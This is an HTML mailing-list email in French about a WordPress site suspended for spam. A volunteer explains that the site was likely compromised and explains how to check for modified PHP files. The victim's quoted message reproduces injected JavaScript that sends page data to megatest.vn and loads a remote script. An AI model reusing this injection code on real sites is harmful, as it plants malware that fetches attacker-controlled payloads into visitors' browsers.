<html>
  <head>
    <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
  </head>
  <body bgcolor="#FFFFFF" text="#000000">
    <div class="moz-cite-prefix">Salut camille,<br>
      <br>
      Un envoi de spam peut signifier:<br>
      <ul>
        <li>Soit que tu as envoyé beaucoup de mail (type newsletter)
          depuis le site et que des gens soient allés se plaindre à free
          (beaucoup ne font la différente entre un mail militant et une
          pub pour du viagra, du moment qu'il n'a pas été désiré, c'est
          triste mais c'est comme ça)</li>
        <li>Soit que ton wordpress a du être hacké par des spammeurs qui
          s'en sont servi pour envoyer du spam.</li>
      </ul>
      <p>Si c'est cette deuxième hypothèse, les pirates ont du profiter
        d'une faille wordpress (ou d'un code d'accès à l'interface
        d'administration facile à trouver) pour prendre la main sur ton
        site, y installer un module de mass-mailing, et balancer à tout
        va des pub diverses avant que free ne te bloque...<br>
      </p>
      <p>Dans ce cas, il ne s'agit pas d'un hack à visée politique
        visant le site en tant que tel, mais d'une attaque automatisée
        cherchant dans la masse de site, lesquels présenteraient une
        vulnérabilité connue, afin d'en profiter pour émettre du spam.<br>
      </p>
      <p>Un moyen de le vérifier si tu as été hackée, est de te promener
        dans le FTP de ton site, si tu voies des fichier en .php (les
        exécutables de ton site web) modifiés récemment, c'est que qqn a
        du trouver un moyen d'injecter ses propres scripts (a fins
        d'envoi de spam) sur ton site.<br>
      </p>
      <p>Si c'est le cas, il ne faudra d'abord "nettoyer" ton
        installation de wordpress avant remise en ligne<br>
      </p>
      <p>JUlien<br>
      </p>
      <p><br>
      </p>
      <div class="moz-signature"><img
          src="cid:part1.00010502.05090202@tuxfamily.org">
        <div style="margin-left: 7px; display: inline-block; color:
          #555555; font-family:cursive;"><font size="+2">Malinux Télé</font><br>
          Donner l’accès aux logiciels libres éducatifs aux enfants du
          Mali et d’ailleurs<br>
          <a style="color:#555555"
            href="http://malinuxtele.tuxfamily.org">http://malinuxtele.tuxfamily.org</a>
        </div>
      </div>
      <p> </p>
      <br>
      Le 29/01/2016 13:34, Camille à barbe via Toulouse-ll a écrit :<br>
    </div>
    <blockquote cite="mid:56AB6A6E.7090405@free.fr" type="cite">Bonjour,
      <br>
      Je gère (comme je peux) un site internet hébergé par free,
      propulsé par <br>
      wordpress 3.1.4. <br>
      <br>
      <br>
      Pourquoi je voudrais le remettre en place ? <br>
      Je l'ai mis en place pour faire suite à une inculpation au sujet
      d'une action <br>
      menée à Notre-Dame-des-Landes qui nous a valu deux procès avant
      d'être relaxés. <br>
      Pour en savoir davantage, il reste un embryon de site que j'avais
      mis en place <br>
      pour préparer le premier procès :<a class="moz-txt-link-freetext"
        href="http://kamyas1naz.free.fr/photos.htm">http://kamyas1naz.free.fr/photos.htm</a>
      <br>
      ainsi que la page facebook associée :<a
        class="moz-txt-link-freetext"
        href="https://www.facebook.com/kamyapoil/">https://www.facebook.com/kamyapoil/</a>
      <br>
      Je poursuis cette démarche et ce site m'est utile pour présenter
      les actions <br>
      déjà menées et en préparer d'autres. <br>
      <br>
      <br>
      Pourquoi free a suspendu le compte ? <br>
      J'ai reçu ce message de la part de free le 27 janvier : <br>
      <br>
      <br>
      "Bonjour, <br>
      <br>
      Ce courrier électronique vous est adressé pour vous indiquer que
      votre compte <br>
      Pages Perso kamyapoil a été suspendu pour la raison suivante : <br>
      <br>
      Votre compte envoie du Spam (mail non solicite) via la fonction
      php mail() <br>
      <br>
      Pour lever la suspension, consultez les newsgroups <br>
      proxad.free.services.pagesperso pour effectuer les pré-requis
      nécessaires à la <br>
      ré-activation de votre compte et postez votre demande dans le fil
      qui vous sera <br>
      indiqué. ( la page d'assistance sur le site de Free vous donnera
      les <br>
      informations nécessaires pour accéder à ce forum - <br>
      <a class="moz-txt-link-freetext"
        href="http://www.free.fr/assistance/541.html">http://www.free.fr/assistance/541.html</a> 
      ). Aucun support ne sera fait par mail. <br>
      <br>
      ATTENTION : en l'absence de réaction de votre part dans les deux
      mois, votre <br>
      compte Pages Perso sera DETRUIT. <br>
      <br>
      <br>
      Cordialement, <br>
      Le service Pages Perso." <br>
      <br>
      J'avais eu un signe avant coureur. A partir du mois d'octobre, des
      lignes de codes ont été insérées à mon insu : <br>
      <br>
      <script>var a=''; setTimeout(10); var default_keyword = <br>
      encodeURIComponent(document.title); var se_referrer = <br>
      encodeURIComponent(document.referrer); var host = <br>
      encodeURIComponent(window.location.host); var base = <br>
      <a class="moz-txt-link-rfc2396E"
        href="http://megatest.vn/js/jquery.min.php">"http://megatest.vn/js/jquery.min.php"</a>;
      var n_url = base + <br>
      "?default_keyword=" + default_keyword + "&se_referrer=" +
      se_referrer + <br>
      "&source=" + host; var f_url = base +
      "?c_utt=snt2014&c_utm=" + <br>
      encodeURIComponent(n_url); if (default_keyword !== null &&
      <br>
      default_keyword !== '' && se_referrer !== null &&
      se_referrer !== <br>
      ''){document.write('<script type="text/javascript" src="' +
      f_url + '">' <br>
      + '<' + '/script>');}</script> <br>
      <br>
      Elles se trouvaient dans l'en-tête des feuilles de style et
      avaient pour effet de bloquer une dizaine de secondes chaque page
      du site qu'on essayait de charger. Je n'y connais vraiment pas
      grand chose, mais un sympathisant m'a prévenu du problème et je
      les ai effacées. Mais elles revenaient à chaque fois, une à deux
      fois par semaine. J'ai pris l'habitude de les retirer. J'ai
      modifié le nom d'administrateur et le mot de passe, mais ça n'a
      pas réglé le problème. J'ai continué à effacer ces lignes de code,
      une à deux fois par semaine. <br>
      Je voulais changer les autres mots de passe (base de données, et
      je ne sais quoi d'autre), et télécharger une version plus récente
      de wordpress puisqu'on n'est plus limité à la version 3.1.4 depuis
      quelques temps, mais je ne l'ai pas fait par peur de tout planter
      : j'espérais trouver quelqu'un pour m'y aider. Free ne m'a pas
      laissé davantage de temps pour résoudre le problème et le site est
      maintenant suspendu. Je ne comprends pas comment faire pour
      accéder à la demande de free. J'ai rencontré quelqu'un de
      tetraneutral qui m'a suggéré de me tourner vers vous. Pouvez vous
      m'aider ? <br>
      <br>
      Merci. <br>
      <br>
      _______________________________________________ <br>
      Toulouse-ll mailing list <br>
      <a class="moz-txt-link-abbreviated"
        href="mailto:Toulouse-ll@toulibre.org">Toulouse-ll@toulibre.org</a>
      <br>
      <a class="moz-txt-link-freetext"
        href="http://toulibre.org/cgi-bin/mailman/listinfo/toulouse-ll">http://toulibre.org/cgi-bin/mailman/listinfo/toulouse-ll</a><br>
    </blockquote>
    <br>
  </body>
</html>